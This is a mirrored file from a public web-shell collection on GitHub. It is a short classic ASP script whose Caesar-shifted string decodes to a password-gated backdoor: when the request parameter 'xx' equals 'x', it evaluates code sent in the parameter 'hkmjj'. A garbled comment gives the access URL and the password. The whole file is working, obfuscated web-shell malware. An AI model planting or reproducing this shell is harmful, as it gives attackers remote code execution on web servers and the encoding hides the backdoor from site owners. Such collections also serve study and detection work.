mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
22 lines
No EOL
653 B
Text
22 lines
No EOL
653 B
Text
<%
|
|
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
|
execute (decode (codeds) )
|
|
Function DeCode (Coded)
|
|
On Error Resume Next
|
|
For i = 1 To Len (Coded)
|
|
Curchar = Mid (Coded, i, 1)
|
|
If Asc (Curchar) = 16 then
|
|
Curchar = chr (8)
|
|
Elseif Asc (Curchar) = 24 then
|
|
Curchar = chr (12)
|
|
Elseif Asc (Curchar) = 32 then
|
|
Curchar = chr (18)
|
|
Else
|
|
Curchar = chr (Asc (Curchar) -3)
|
|
End if
|
|
DeCode = Decode&Curchar
|
|
Next
|
|
End Function
|
|
'response.write(decode(codeds))
|
|
' ²Ëµ¶Á¬½Ó /hkmjj.asp?xx=x ,ÃÜÂë hkmjj
|
|
%> |